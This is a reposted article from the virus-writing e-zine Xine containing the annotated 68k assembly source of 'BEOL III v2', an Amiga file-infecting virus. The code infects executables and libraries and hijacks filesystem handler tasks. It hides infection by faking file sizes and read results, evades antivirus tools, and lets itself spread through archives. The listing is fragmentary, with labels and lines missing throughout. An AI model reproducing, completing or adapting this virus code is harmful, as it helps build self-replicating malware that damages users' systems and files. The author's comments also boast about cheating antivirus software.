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 · 31 Jul 2023

| Xine - issue #2 - Phile 030 |

* BEOL III v2 *
* Diff from v1: Stealth only enabled when file is _REALLY_ infected! *
* *
* Bugs: Libraryinfectioncode isn't reentrant => we could end up with fucked *
* up libs, if we infect 2 libraries at the same time!!! *
* Libraryinfection doesn't recognize libs with 2nd word != $4e75 *
* There is no list arbitration, which could lead to missed read-calls.*
* Library infection can't handle libs with name&id-string in other *
* hunks. *
incdir hd1:dev/assembler/asm-one/include/
include lvo3.0/exec_lib.i
include lvo3.0/dos_lib.i
include dos/dosextens.i
include dos/doshunks.i
include dos/dostags.i
include exec/execbase.i
include exec/memory.i
include exec/resident.i
include workbench/startup.i

* This hunk simulates an infected programm. *
section mindfuck,code
movem.l d0-a6,-(a7)
lea OldProggy,a0
move.w #SaveMemSize/4-1,d0
.cl1 move.l (a0)+,-(a7)
dbf d0,.cl1
move.w #OldProggySize-SaveMemSize-1,d0
.cl2 move.b (a0)+,-SaveMemSize-1(a0)
dbf d0,.cl2
move.w #SaveMemSize/4-1,d0
.cl3 move.l (a7)+,-(a0)
dbf d0,.cl3
movem.l (a7)+,d0-a6
jmp Virus

* This is the virus entry point!!! *
section virus,code
MagicNumber equ -23
Virus: pea Virus(pc)
movem.l d0-d7/a0-a6,-(a7)

move.l 4.w,a6 ;Execbase
move.l (ThisTask,a6),a0 ;CurrentTask
move.l (pr_CLI,a0),d0 ;BPTR to CLI struct
beq.s .wbench ;Programm called from workbench!
lsl.l #2,d0 ;BPTR => APTR
moveq #cli_Module,d1
bra.s .cli
add.w #pr_MsgPort,a0 ;Messageport
jsr (_LVOWaitPort,a6) ;Wait for WBStartupMessage (d0=msg)
moveq #sm_Segment,d1
.cli add.l d1,d0
move.l d0,a5

bsr.b RestoreOldSeg
beq.b .shit

move.l d1,(a5) ;Cheat stupid AV-ware like VirusZ!!
addq.l #4,d0 ;Pointer to begin of code.
move.w #$4ef9,(a0)+ ;jmp $xxxxxxxx.l
move.l d0,(a0)+ ;Address (for resident proggys!)
.shit move.w #$4e75,(a0)+

Done: lea Virus(pc),a2
move.l a2,d0
sub.l d0,(rtMT-Virus,a2) ;Remove reloc information
sub.l d0,(rtInit-Virus,a2) ; -"-
move.w #virlen/4-1,d7
.cvl move.l (a2)+,(a3)+
dbf d7,.cvl
move.l a6,(a3) ;Save Dosbase after virus
move.l 4.w,a6
move.l a4,a1
move.l (a4),d0
jsr (_LVOFreeMem,a6)
jsr (_LVOCacheClearU,a6)
jmp InfectTasks-end(a3)

* This is the entry point of Libraries, devices, ... *

Init: movem.l d0-a6,-(a7)
bsr.b RestoreOldSeg
beq.b .shit

move.l a6,-(a7)
move.l a0,d1
subq.l #4,d1
lsr.l #2,d1 ;Seglist
move.l d0,a1
.fr cmp.w #$4afc,(a1)+ ;Search original resident-struct
bne.b .fr
subq.w #2,a1
move.l 4.w,a6
jsr (_LVOInitResident,a6)
move.l (a7)+,a6
bra.b .fin
.shit: moveq #-1,d0
.fin move.l d0,(a7) ;Result
bra.b Done

* RestoreOldSeg: Restores the original data and uses InternalLoadSeg() *
* to scatterload the proggy into mem *
* Output: d0.l=APTR to seglist *
* d1.l=BPTR to seglist *
move.l 4.w,a6

bsr.b .DN
dc.b 'dos.library',0
.DN: move.l (a7)+,a1
jsr (_LVOOldOpenLibrary,a6) ;Open dos.library

move.l (SysStkLower,a6),a3
move.l Virus-4(pc),d1 ;BPTR to nxt segment
lsl.l #2,d1
move.l d1,a4 ;APTR to nxt segment
move.l -(a4),d7 ;Len of nxt segment+8
subq.l #8,d7 ;Len of segment
lea (8,a4,d7.l),a1 ;Ptr to end of code
move.w #SaveMemSize/4-1,d6
move.w d6,d5
.cl1 move.l -(a1),-(a7) ;Save header on stack
dbf d6,.cl1
move.l d7,d6
sub.l (ReadEntry\.sms+2,pc),d6
.cl2 move.b -(a1),SaveMemSize(a1) ;Move mainpart
subq.l #1,d6
bne.b .cl2
.cl3 move.l (a7)+,(a1)+ ;restore header.
dbf d5,.cl3

sub.l a0,a0 ;Table (for overlay shit...)
pea (_LVOFreeMem,a6)
pea (_LVOAllocMem,a6)
pea (MyRead,pc)
move.l a7,a1 ;FunctionArray
clr.l -(a7)
move.l a7,a2 ;Pointer to ULONG???
pea (8,a4) ;Actpos
pea (8,a4,d7.l) ;End
move.l d0,a6 ;DosBase => a6
move.l a7,d0 ;fh
jsr (_LVOInternalLoadSeg,a6)
lea (6*4,a7),a7 ;remove shit from stack...

lea (Virus-4,pc),a0
move.l d0,(a0)+
move.l d0,d1
lsl.l #2,d0

dc.w $4afc ;rt_MatchWord
rtMT: dc.l Resident ;rt_MatchTag
dc.l 0 ;rt_EndSkip
dc.b 0 ;rt_Flags
Ver: dc.b 0 ;rt_Version
Type: dc.b 0 ;rt_Type
dc.b 0 ;rt_Pri
rtName: dc.l 0 ;rt_Name
rtID: dc.l 0 ;rt_IdString
rtInit: dc.l Init ;rt_Init

* ExamineEntry: This process decreases filelength in Examine-Packets, *
* if the file is infected *
bsr.w InitProc
moveq #fib_Comment/4,d0
add.l (a2),d0 ;BPTR to Comment
lsl.l #2,d0 ;BPTR=>APTR
move.l d0,a0

moveq #0,d0
move.b (a0),d0
beq.b .notinf
tst.b (a0,d0.w)
bne.b .notinf
.sms4 sub.l #SaveMemSize+4,(fib_Size-fib_Comment,a0)
.notinf bra.b ReadEntry\.xit
* ReadEntry: This process has to handle read-calls of infected *
* files. The packet we get is the original read-packet *
* First, we have to get fileposition and filelength then we *
* cam simulate a read-call. *
bsr.b InitProc
movem.l (a7),d0/d4/d5/d6/a4 ;d0=ACTION_READ (dummy!)
;d4=Nr. of bytes read.
;d5=Secondarry error

bsr.w SeekEOF ;Go end!!
move.l d0,d2 ;Save Position
move.l d2,d3
sub.l d4,d3 ;Begin of Read
bsr.w SeekBeg ;Goto old postion
sub.l (ExamineEntry\.sms4+2,pc),d0 ;Len of original file
bmi.b .shit ;<0 => Something wrong???
sub.l d2,d0
bgt.b .d2ok
moveq #0,d5 ;IoErr() should return EOF
add.l d0,d2 ;Correct end seek position
add.l d0,d4 ;Kill stuff he mustn't see.
bmi.b .shit ;max read<0 => error
.sms cmp.l #SaveMemSize,d3 ;Do we need to do stealth???
bge.b .nostealth ;no :)))
;Compute correct Fileposition
move.l d3,d0
sub.l (ExamineEntry\.sms4+2,pc),d0
bsr.w SeekEnd
move.l (.sms+2,pc),d0
sub.l d3,d0 ;Maximum ReadLength
cmp.l d0,d4
bgt.b .d4sux
move.l d4,d0
.d4sux move.l d0,(dp_Arg3-dp_Arg2,a2)
move.l a4,(a2)
moveq #ACTION_READ,d0
bsr.w DoPktD6
move.l d2,d0
bsr.w SeekBeg
bra.b .ok
.shit moveq #-1,d4 ;Error
.ok movem.l d4/d5,(4,a7) ;Result
.xit bra.w ProcEntry\.endprocess3

* InitProc: Does some initial stuff: *
* Gets Execbase, CurrentTask, SPLower, MsgPort. *
* Waits for the initial Packet. *
* Saves Packet on stack. *
move.l 4.w,a6
move.l (ThisTask,a6),a2 ;Current Task=>a2
move.l (TC_SPLOWER,a2),a5 ;tc_SPLower, used for FIB (100% sure
;of being longword aligned!!!)
moveq #pr_MsgPort,d7 ;pr_MsgPort+Current Task
add.l a2,d7 ;=MsgPort of our process
bsr.w WaitMsg
move.l (a7)+,a0
lea 48-dp_Arg2(a2),a1
moveq #10-1,d0
.sp1 move.l -(a1),-(a7) ;Save Packet
dbf d0,.sp1
jmp (a0)

* ProcEntry: This is the process whose task is to infect the file. *
* at the begin it recieves a packet, which is the replypacket *
* for the FIND_INPUT function for the file. Arg7 is set to *
* the original owner of the packet. *
* TO FIX: This isn't (but should be) 100% reentrant. *
* Input: d0-d7/a0-a6:Bullshit *
* Output: nobody cares,because a process has it's own set of regs *
bsr.b InitProc
;We got the message from the handler. This message is the OPENPacket
;we have stolen from the handler.
lea dp_Arg1-dp_Arg2(a2),a1
sub.l a0,a0
move.l (a1)+,d0 ;BPTR to filehandle
lsl.l #2,d0 ;BPTR=>APTR
move.l 36(a0,d0.l),d6 ;fh_Args=>d6 (This must be passed to
;several functions (close,read,...))

move.l (a1)+,a4 ;Save parentlock
move.l (a1)+,d5 ;BPTR to filename
move.l d5,d0
lsl.l #2,d0 ;d0=APTR to filename (still a BSTR!)
cmp.l #$092e6261,(a0,d0.l) ;begin of BSTR(".backdrop") ???
bne.b .NoBack
;someone wants to read a .backdrop file. in most cases, this means,
;that someone inserted a disk into a drive, or that the wb has been
;started. we use this to infect the c:mount command of the new disk!
movem.l d0-d3/a0-a2/a6,-(a7)
move.l DosBase(pc),a6
move.l a4,d1 ;lock
jsr (_LVODupLock,a6) ;duplock
move.l d0,d1 ;or is it allready in d1???
beq.b .fub
jsr (_LVOCurrentDir,a6) ;current dir
jsr (_LVOUnLock,a6) ;Unlock oldlock
bsr.b .lwb
dc.b 'c/mount',0
.lwb move.l (a7)+,d1 ;APTR to "c/mount"
move.l dp_Type-dp_Arg2(a2),d2 ;MODE_OLDFILE
jsr (_LVOOpen,a6) ;Open file (and infect it!!)
jsr (_LVOClose,a6) ;Close file
.fub movem.l (a7)+,d0-d3/a0-a2/a6

.NoBack tst.l dp_Res1-dp_Arg2(a2) ;OK??? (0=DOSFALSE -1=DOSTRUE)
beq.w .nofh

move.l a5,d0 ;fib=>d0
lsr.l #2,d0 ;APTR 2 BPTR
move.l d0,(a2) ;arg2=BPTR(fib)

move.l a4,dp_Arg1-dp_Arg2(a2) ;arg1=parentlock
moveq #ACTION_INFO,d0
bsr.w DoPkt
bpl.b .bplerr3

lea 16(a5),a5
move.l (a5),d0 ;NumUsedBlocks (a5=Info+16)
sub.l -(a5),d0 ;-NumBlocks (a5=Info+12)
addq.l #8,d0 ;Are there more than 8 blocks left??
bpl.b .bplerr3 ;No=>exit

bsr.w DoPktD6
bpl.w .err3

move.l fib_Size-12(a5),d4 ;save old size
pea (fib_Comment-12,a5) ;save pointer to comment
move.l (fib_Protection-12,a5),-(a7) ;save protectionflags

moveq #4,d0
move.l d0,dp_Arg3-dp_Arg2(a2) ;Arg3=Length of Buffer
subq.l #4,a7 ;Make space
move.l a7,(a2) ;Arg2=Mem
moveq #ACTION_READ,d0
bsr.w DoPktD6
.hh cmp.l #HUNK_HEADER,(a7)+ ;HUNK_HEADER??
bne.w .noexe

bsr.w SeekStart ;Go back!!

move.l (ExamineEntry\.sms4+2,pc),d0 ;size of buffer we need
move.l d0,d3
moveq #MEMF_PUBLIC,d1
jsr (_LVOAllocVec,a6)
move.l d0,a5
move.l d0,(a2) ;buffer
beq.w .noexe ;error=>exit

move.l d3,dp_Arg3-dp_Arg2(a2)
moveq #ACTION_READ,d0
bsr.w DoPktD6 ;read it.
cmp.l d0,d3 ;Have we read all?
bne.b .bneerr4 ;no=>error

.name cmp.l #'BEOL',(.name+2-Virus+9*4,a5)
;Loox like file from us?
bne.b .nobeol
bsr.w SeekStart ;go to beginning of file!
bsr.w MarkFile ;Set mark, etc.

;File is infected=> we add it to the list of infected FHs
lea (InfList,pc),a0
addq.l #4,(a0) ;Not reentrant!!!!!
add.l (a0),a0
move.l d6,(a0)
clr.l (dp_Arg6-8,a7) ;Clear Mark bcoz we don't want to miss pkts
move.l dp_Port-dp_Arg2(a2),d7
;MsgPort of Handler
move.l dp_Arg7-dp_Arg2(a2),dp_Port-dp_Arg2(a2)
;MsgPort of the legal Packetowner
bra.w .endprocess2
move.l #HUNK_END,-4(a5,d3.w)
;-------- check if file is ok.
move.l d3,d0
lsr.l #1,d0
move.l a5,a0
move.l a5,d1
.sc cmp.w #HUNK_CODE,(a0)+
dbeq d0,.sc
bne.b .bneerr4
sub.l a0,d1 ;d1=-distance from begin of file to 1st hunk
addq.w #4,a0
beq.w .err4
addq.w #2,a0
cmp.w #$4e75,(a0)+ ;$4e75 => library or stuff like that.
bne.b .isok
;-------- library, device,... ??? => search for resident struct!
.sc2 cmp.w #$4afc,(a0)+
dbeq d0,.sc2
bne.w .err4
move.l #SaveMemSize-80,d0
cmp.l (RT_NAME-2,a0),d0
blt.b .bneerr4
cmp.l (RT_IDSTRING-2,a0),d0
blt.b .bneerr4

lea Ver(pc),a1
add.w #RT_VERSION-2,a0
move.b (a0)+,(a1)+ ;Version
move.w (a0)+,(a1)+ ;Type & Priority
move.l d4,d0 ;original len
sub.l d1,d0 ;+offset to 1st hunk
sub.l #SaveMemSize-4,d0 ;-SaveMemSize
move.l (a0)+,(a1) ;Name
add.l d0,(a1)+
move.l (a0)+,(a1) ;Idstring
add.l d0,(a1)+
lsr.l #2,d4 ;len in longwords
bcs.b .bneerr4 ;only want filelengths mod 4 =0!!

bsr.w SeekEOF ;Go end!!

moveq #0,d1 ;----rwed
bsr.w Protect ;so we can write it...

move.l a2,a1
move.l a5,(a1)+ ;ptr to buffer
move.l d3,(a1)+ ;no. of bytes to write
moveq #ACTION_WRITE,d0
bsr.w DoPktD6 ;write it.

bsr.w SeekStart ;Go beginning

move.l a5,a0
addq.l #8,a0 ;1st 8 bytes allready initialised
moveq #2,d0
move.l d0,(a0)+ ;2 hunks
clr.l (a0)+ ;Number of first hunk=0
moveq #1,d1
move.l d1,(a0)+ ;Number of last hunk=1
move.w #virlen/4,d0
move.l d0,(a0)+ ;Len of first hunk
move.l d4,(a0)+ ;Len of 2nd hunk
move.w #HUNK_CODE,d1
move.l d1,(a0)+
move.l d0,(a0)+
move.l #$487afffe,(a0)+ ;pea *-2(pc)
move.l MMOC(pc),(a0)+ ;movem.l d0-a6,-(a7)

lea (Virus+8,pc),a1
move.w #(virlen-8)/4-1,d0
.cvl2 move.l (a1)+,(a0)+ ;CopyVir
dbf d0,.cvl2

addq.l #3,d1 ;HUNK_RELOC32
move.l d1,(a0)+
moveq #2,d0
move.l d0,(a0)+ ;2 Relocs
clr.l (a0)+ ;From Hunk0
lea (rtMT-Virus).w,a1
move.l a1,(a0)+ ;reloc nr.1
add.w #rtInit-rtMT,a1
move.l a1,(a0)+ ;reloc nr.2
move.l d0,(a0)+ ;2 Relocs
moveq #1,d0
move.l d0,(a0)+ ;From Hunk1
subq.l #rtInit-rtName,a1
move.l a1,(a0)+ ;reloc nr.1
addq.l #rtID-rtName,a1
move.l a1,(a0)+ ;reloc nr.2
clr.l (a0)+ ;No more relocs
move.l d1,(a0)+
move.l d1,(a0)+
move.l d4,(a0)+

move.l a2,a1
move.l a5,(a1)+ ;ptr to buffer
subq.l #4,d3
move.l d3,(a1)+ ;no. of bytes to write
moveq #ACTION_WRITE,d0
bsr.w DoPktD6 ;write it.

bsr.b Close
bsr.b MarkFile
bra.b .nofh
move.l a5,a1 ;Buffer
jsr (_LVOFreeVec,a6) ;Free it!!
addq.w #8,a7 ;remove shit from stack
bsr.b Close
move.l dp_Arg7-dp_Arg2(a2),d7 ;MsgPort of the legal Packetowner
lea dp_Type-dp_Arg2(a2),a0
moveq #10-1,d0
.rp move.l (a7)+,(a0)+ ;Restore Packet
dbf d0,.rp
;FALL THRU to PutPkt!!!
move.l dp_Port-dp_Arg2(a2),a0 ;This is the MSGPort of the handler.
move.l d7,dp_Port-dp_Arg2(a2)
move.l d7,14(a3)
move.l a3,a1 ;MSG=>a1
jmp (_LVOPutMsg,a6) ;Send it!!

;Exit From Process

;remember: all the following subroutines expect A6 to contain the
; execbase address!!!
* MarkFile: Frees Buffer resets protection flags & filedate. And marks *
* file as infected *
move.l a5,a1 ;Buffer
jsr (_LVOFreeVec,a6) ;Free it!!

movem.l (a7)+,d0/d1/d2 ;d0=Returnaddress d1=ProtectionFlags
;d2=Ptr to comment
move.l d0,-(a7) ;Push return address
move.l d2,a0 ;Comment
move.l d2,a1

moveq #0,d0
move.b (a0),d0
beq.b .mark
add.w d0,a1
tst.b (a1)+
beq.s .ninf
.mark clr.b (a1)+ ;Make sure, that next char in comment is 0!
clr.b (a1)+ ;Special case len=0
addq.b #1,(a0) ;Mark file!
bsr.b Protect ;restore protectionflags

lsr.l #2,d2 ;dp_Arg4=BPTR to Comment
bsr.b .pktd2

clr.l (dp_Arg6-8+4,a7);Clear Mark in order to activate stealth!!

subq.l #(fib_Comment-fib_DateStamp)/4,d2
lsl.l #2,d2 ;dp_arg4=APTR to datestamp
move.l d2,(dp_Arg4-dp_Arg2,a2)
bra.b DoPkt
* Close: Closes File *
move.w #ACTION_END,d0
bra.b DoPktD6

* Protect: sets the protection flag of the file *
* Input: d1=protectionflags *
* a2=Packet *
* a3=ExecMessage of Packet d7=OurMsgPort *
* d5=BPTR to filename *
* Destroyed: d0/d1/a0/a1 *
lea dp_Arg5-dp_Arg2(a2),a0
move.l d1,-(a0) ;fh_arg4=Protectionflags
move.l d5,-(a0) ;fh_arg3=filename
move.l a4,-(a0) ;fh_arg2=parentlock
clr.l -(a0) ;no idea what this lword means...
bra.b DoPkt
* SeekEOF: Go to end of file *
* SeekEnd: Seek relative to end of file *
* SeekStart: Go to beginning of file *
* SeekBeg: Seek relative to beginning of file *
* Seek: Sends a ACTION_SEEK pkt *
* Input: d0.l=Arg2 *
* d1.l=Arg3 *
moveq #0,d0
moveq #OFFSET_END,d1
bra.b Seek
moveq #0,d0
movem.l d0/d1,(a2)
move.w #ACTION_SEEK,d0
* DoPktD6: Same as DoPkt, but puts d6 in Arg1 of Packet *
move.l d6,dp_Arg1-dp_Arg2(a2)

;Remark: fall thru to DoPkt!!
* DoPkt: Sends a Packet to handler and waits for it's return *
* this function is reentrant. *
* ReDoPkt: like DoPkt, but doesn't set packettype. *
* Input: d0=Type of packet *
* a3=ExecMessage of Packet d7=Our MsgPort *
* Output: d0:12(a2) (=res1) *
* CCs set depending on d0 *
* Destroyed: d0/d1/a0/a1 *
move.w d0,dp_Type+2-dp_Arg2(a2)
bsr.b PutPkt
;FALL THRU to WaitMsg

* WaitMsg: Waits for a message to appear at our port. *
* this function is reentrant. *
* Input: d7:MsgPort a6:Execbase *
* Output: d0:12(a2) (=res1) *
* CCs set depending on d0 *
* a2:DosPacket+dp_Arg2 *
* a3:Message *
* Destroyed: d0/d1/a0/a1 *
move.l d7,a0 ;MsgPort
jsr (_LVOWaitPort,a6) ;WaitPort
move.l d7,a0 ;MsgPort
jsr (_LVOGetMsg,a6) ;GetMsg
move.l d0,a3 ;MSG=>a3
move.l 10(a3),a2 ;DosPacket=>a2
lea dp_Arg2(a2),a2
move.l dp_Res1-dp_Arg2(a2),d0

* Here's the list of the archivers, where we disable infection & stealth. *
* Each packer is represented by a longword. The 1st byte is the len of *
* the name. The others are the first 3 bytes. *
* They have to be orderd by value of the Longword. *
dc.l $dfdfdfdf ;Uppercase
dc.b 03,'L','H','A' ;LHA
dc.b 03,'L','Z','X' ;LZX
dc.b 03,'Z','I','P' ;ZIP
dc.b 05,'L','H','A' ;LHARC
* IsInList: checks if file is in list of infected files. *
* Input: a5=Pointer to packet+8 *
* Output: d2=Offset to last item *
* a0=Pointer to item *
* a1=Pointer to list *
* Z-Flag: 1 if file is in list *
move.l dp_Arg1-8(a5),d1 ;get fh
lea (InfList,pc),a0
move.l a0,a1
move.l (a0)+,d2 ;number of list entries
.filel subq.l #4,d2
bmi.b .rts
cmp.l (a0)+,d1 ;check nxt file
bne.b .filel
.rts rts

* NewWP: This is the WaitPkt() replacement for the Handlers. *
* BUG: the list code isn't reentrant. *
* Input: ???? (I have no documentation, but i think its just *
* bullshit) *
* Output: d0.l=ptr to Message (not to packet!) *
NewWP: movem.l d0-d7/a0-a6,-(a7)
move.l 4.w,a6
moveq #pr_MsgPort,d7
add.l ThisTask(a6),d7 ;Compute ptr to msgport
bsr.b WaitMsg ;Get packet

move.l 10(a3),a5 ;Address of Packet
addq.l #4,a5

clr.l -(a7) ;TAG_DONE

moveq #MagicNumber,d0
cmp.l dp_Arg6-4(a5),d0 ;Marked Packet???
beq.b .goshitpkt2 ;Yup=>exit

;Check, if calling programm is lha,lzx or zip. If yes, disable infection
;because this causes illegal archives (they examine first). Disable
;stealth, because we want the virus in the archive!
sub.l a1,a1 ;clear a1
move.l (a5)+,d1 ;Ptr to MsgPort of Packetowner.
beq.b .goshitpkt2 ;In my tests i got pkts with dp_Port==0 !?
cmp.b #NT_PROCESS,(LN_TYPE-pr_MsgPort,a1,d1.l) ;Process??
bne.b .nopack
move.l (pr_CLI-pr_MsgPort,a1,d1.l),d2 ;Cli structure
beq.b .nopack
lsl.l #2,d2 ;BPTR=>APTR
move.l (cli_CommandName,a1,d2.l),d3
beq.b .nopack
lsl.l #2,d3 ;BPTR=>APTR
move.l (a1,d3.l),d4 ;4 bytes of BSTR
lea (Packers,pc),a0
and.l (a0)+,d4 ;Make uppercase
.chkpak cmp.l (a0)+,d4
beq.b .goshitpkt2 ;If packer, exit!
bgt.b .chkpak ;If > then continue

;Check if packet is interesting...
move.l (a5),d1
beq.b .expkt
beq.b .expkt
beq.b .readpkt

beq.b .openpkt

beq.b .endpkt

beq.b .seekpkt

bne.b .shitpkt2
pea ExamineEntry(pc)
bra.b .pktcont
;ACTION_END: if we have this one in our list, we delete it from there
.endpkt bsr.w IsInList
bne.b .shitpkt2
move.l (a0,d2.l),(a0) ;Overwrite with last listitem
subq.l #4,(a1) ;decrease list-length
bra.b .shitpkt2
bsr.w IsInList
bne.b .shitpkt2
pea ReadEntry(pc)
bra.b .pktcont
bsr.w IsInList
bne.b .shitpkt2
tst.l (dp_Arg3-8,a5) ;OFFSET_END??
ble.b .shitpkt2
move.l (ExamineEntry\.sms4+2,pc),d0
sub.l d0,(dp_Arg2-8,a5)
bra.b .shitpkt2
pea ProcEntry(pc)
move.l d0,dp_Arg6-8(a5) ;Mark Packet

pea (NP_Entry).l
move.l a7,d1

move.l (DosBase,pc),a6
jsr (_LVOCreateNewProc,a6) ;CreateNewProc
move.l 4.w,a6
tst.l d0 ;OK??
beq.b .shitpkt ;No=>Badluck

moveq #pr_MsgPort,d1
add.l d1,d0 ;Ptr to msgport of newproc

move.l -(a5),dp_Arg7-4(a5) ;Save old ReplyPort
move.l d0,(a5) ;dp_Port
move.l d0,14(a3) ;mn_ReplyPort

addq.w #8,a7
addq.w #4,a7
move.l a3,(a7) ;return msg in d0
;FALL THRU to InfectTasks!!!
* InfectTasks: The cool BEOL task infection stuff. Check this *
* out! *
* Input: a6:execbase *
* stack: d0-a6 (will be restored!) *
* Output: nothing *
jsr (_LVOForbid,a6)
sub.l a5,a5 ;clear a5
move.l DosBase(pc),a4 ;dosbase=>a4
move.l 34(a4),a4 ;RootNode
move.l dp_Arg2(a4),d1 ;DosInfo
lsl.l #2,d1 ;BPTR=>APTR
move.l 4(a5,d1.l),d1 ;DevInfo
bra.b .dle
.dl movem.l (a5,d1.l),d1/d2/a1 ;d1=BPTR to next DevInfo
;a1=ptr to msgport of handler
subq.l #2,d2 ;Type==DLT_VOLUME???
bne.b .dle ;No=>get nxt
;Infect the task:
pea NewWP(pc) ;Our own code.
move.l (a7)+,(pr_PktWait-pr_MsgPort,a1)
;store it in pr_PktWait
.dle lsl.l #2,d1 ;BPTR=>APTR
bne.b .dl
jsr (_LVOPermit,a6) ;Permit
Quit: movem.l (a7)+,d0-d7/a0-a6

* Replacement for DOS-Read(). *
* Input: *
* d1.l=Ptr to file *
* d2.l=Ptr to Buffer *
* d3.l=Len *
* Output: *
* d0.l=Number of bytes read *
move.l d1,a1
move.l (a1)+,d0 ;End
sub.l (a1),d0 ;-actpos = Max. Read.
cmp.l d0,d3
bge.b .d0ok
move.l d3,d0
.d0ok move.l d0,d1
move.l (a1),a0
add.l d0,(a1)
move.l d2,a1
bra.b .cle
.cl move.b (a0)+,(a1)+
.cle dbf d1,.cl

cnop 0,4 ;Make sure that (virlen & %11)=0 !!
virlen equ end-Virus
DosBase = end
InfList = DosBase+4
SaveMemSize = virlen+(22*4)

section testdata,data
incbin "c:list"
OldProggySize = *-OldProggy

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